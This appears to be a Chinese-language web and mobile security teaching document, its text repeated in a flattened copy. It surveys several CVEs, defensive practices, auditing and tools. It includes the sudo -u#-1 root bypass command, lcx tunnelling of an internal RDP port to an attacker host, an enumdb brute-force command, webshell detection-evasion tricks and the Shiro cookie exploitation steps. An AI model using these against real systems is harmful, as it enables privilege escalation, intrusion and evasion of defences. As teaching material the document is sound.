Web及移动安全综合教学文档

一、安全漏洞分析

1. ThinkCMF框架任意内容包含漏洞

漏洞描述：ThinkCMF框架存在文件包含漏洞，攻击者可利用此漏洞包含任意文件
利用条件：需要特定配置环境
修复建议：升级至最新版本，限制文件包含路径

2. CVE-2019-14287 Linux sudo权限绕过

漏洞详情：当sudo配置允许用户以任意用户身份执行命令时，可通过特定参数绕过限制
复现步骤：
1. 检查sudo配置是否包含(ALL, !root)规则
2. 执行sudo -u#-1 id可获取root权限
修复方案：升级sudo至1.8.28以上版本

3. WebLogic反序列化漏洞(CVE-2019-2890)

影响版本：WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3
漏洞原理：T3协议反序列化过程中存在缺陷
防护措施：限制T3协议访问，安装官方补丁

二、Web安全技术

1. Webshell转换技巧

常见类型：ASP/PHP/JSP webshell
绕过方法：
- 使用编码转换(base64/hex/rot13)
- 拆分关键函数
- 利用回调函数
检测手段：文件完整性检查，行为监控

2. SQL注入防御

防御层级：
1. 输入验证
2. 参数化查询
3. 最小权限原则
4. WAF防护
PDO正确使用：
- 必须使用prepare+execute
- 禁用模拟预处理
- 设置错误模式为异常

3. Shiro反序列化漏洞

漏洞成因：RememberMe功能使用固定密钥加密
利用流程：
1. 收集有效Cookie
2. 使用ysoserial生成payload
3. AES加密后替换Cookie
修复方案：更新Shiro版本，自定义加密密钥

三、渗透测试实战

1. 内网转发技术

Lcx使用：

lcx -listen 2222 3333   # 本地监听
lcx -slave 攻击机IP 2222 内网IP 3389 # 内网转发

替代工具：Earthworm, reGeorg

2. 钓鱼网站渗透

信息收集：
- Whois查询
- 目录扫描
- CMS识别
突破点：
- 后台弱口令
- 未授权访问
- 文件上传漏洞

3. AWD防御策略

Web防护：
- 删除危险函数(exec,system等)
- 禁用危险组件
- 设置文件监控
应急响应：
- 备份网站源码
- 分析恶意文件
- 修补漏洞

四、安全工具使用

1. Enumdb数据库工具

功能：
- 多线程爆破
- 自动识别数据库类型
- 后渗透利用

命令示例：

enumdb -t mysql -h 192.168.1.1 -u root -w wordlist.txt

2. OWASP ZAP扫描器

扫描流程：
1. 配置代理
2. 爬取网站结构
3. 主动扫描
4. 分析结果
高级功能：Fuzz测试，API扫描

3. Truegaze静态分析工具

支持平台：Android/iOS
检测项：
- 硬编码凭证
- 不安全的API使用
- 权限过度申请

五、代码审计方法

1. 审计入门流程

了解架构：MVC/微服务等
危险函数定位：
- 文件操作：fopen, include
- 命令执行：exec, system
- 数据库操作：mysql_query
参数追踪：从输入点到执行点

2. 反序列化漏洞审计

关键点：
- unserialize函数调用
- 魔术方法(__wakeup, __destruct)
- 第三方库反序列化

3. 文件上传漏洞审计

检查项：
- 文件类型检测
- 内容检查
- 路径处理
- 权限设置

六、服务器安全配置

1. Linux Web服务器加固

基础措施：
- 更新系统补丁
- 禁用root远程登录
- 配置防火墙
Web特定：
- 限制目录权限
- 禁用危险函数
- 日志审计

2. 文件共享服务器安全

Samba配置：
- 使用最新协议版本
- 限制访问IP
- 启用加密
NFS安全：
- 使用RPCSEC_GSS
- 限制exports范围

七、漏洞挖掘技术

1. 信息收集方法

主动收集：
- 端口扫描(nmap)
- 子域名枚举
- 目录爆破
被动收集：
- 搜索引擎查询
- 历史漏洞查询
- DNS记录查询

2. 漏洞挖掘思路

黑盒测试：
- Fuzz测试
- 边界值测试
- 异常输入测试
白盒测试：
- 代码审计
- 架构分析
- 依赖组件检查

本教学文档涵盖了Web及移动安全的核心知识点，包括漏洞分析、防御技术、实战方法和工具使用。建议结合具体环境进行实践，并持续关注安全动态更新知识库。

Web及移动安全综合教学文档一、安全漏洞分析 1. ThinkCMF框架任意内容包含漏洞漏洞描述：ThinkCMF框架存在文件包含漏洞，攻击者可利用此漏洞包含任意文件利用条件：需要特定配置环境修复建议：升级至最新版本，限制文件包含路径 2. CVE-2019-14287 Linux sudo权限绕过漏洞详情：当sudo配置允许用户以任意用户身份执行命令时，可通过特定参数绕过限制复现步骤：检查sudo配置是否包含 (ALL, !root) 规则执行 sudo -u#-1 id 可获取root权限修复方案：升级sudo至1.8.28以上版本 3. WebLogic反序列化漏洞(CVE-2019-2890) 影响版本：WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3 漏洞原理：T3协议反序列化过程中存在缺陷防护措施：限制T3协议访问，安装官方补丁二、Web安全技术 1. Webshell转换技巧常见类型：ASP/PHP/JSP webshell 绕过方法：使用编码转换(base64/hex/rot13) 拆分关键函数利用回调函数检测手段：文件完整性检查，行为监控 2. SQL注入防御防御层级：输入验证参数化查询最小权限原则 WAF防护 PDO正确使用：必须使用prepare+execute 禁用模拟预处理设置错误模式为异常 3. Shiro反序列化漏洞漏洞成因：RememberMe功能使用固定密钥加密利用流程：收集有效Cookie 使用ysoserial生成payload AES加密后替换Cookie 修复方案：更新Shiro版本，自定义加密密钥三、渗透测试实战 1. 内网转发技术 Lcx使用：替代工具：Earthworm, reGeorg 2. 钓鱼网站渗透信息收集： Whois查询目录扫描 CMS识别突破点：后台弱口令未授权访问文件上传漏洞 3. AWD防御策略 Web防护：删除危险函数(exec,system等) 禁用危险组件设置文件监控应急响应：备份网站源码分析恶意文件修补漏洞四、安全工具使用 1. Enumdb数据库工具功能：多线程爆破自动识别数据库类型后渗透利用命令示例： 2. OWASP ZAP扫描器扫描流程：配置代理爬取网站结构主动扫描分析结果高级功能：Fuzz测试，API扫描 3. Truegaze静态分析工具支持平台：Android/iOS 检测项：硬编码凭证不安全的API使用权限过度申请五、代码审计方法 1. 审计入门流程了解架构：MVC/微服务等危险函数定位：文件操作：fopen, include 命令执行：exec, system 数据库操作：mysql_ query 参数追踪：从输入点到执行点 2. 反序列化漏洞审计关键点： unserialize函数调用魔术方法(__ wakeup, __ destruct) 第三方库反序列化 3. 文件上传漏洞审计检查项：文件类型检测内容检查路径处理权限设置六、服务器安全配置 1. Linux Web服务器加固基础措施：更新系统补丁禁用root远程登录配置防火墙 Web特定：限制目录权限禁用危险函数日志审计 2. 文件共享服务器安全 Samba配置：使用最新协议版本限制访问IP 启用加密 NFS安全：使用RPCSEC_ GSS 限制exports范围七、漏洞挖掘技术 1. 信息收集方法主动收集：端口扫描(nmap) 子域名枚举目录爆破被动收集：搜索引擎查询历史漏洞查询 DNS记录查询 2. 漏洞挖掘思路黑盒测试： Fuzz测试边界值测试异常输入测试白盒测试：代码审计架构分析依赖组件检查本教学文档涵盖了Web及移动安全的核心知识点，包括漏洞分析、防御技术、实战方法和工具使用。建议结合具体环境进行实践，并持续关注安全动态更新知识库。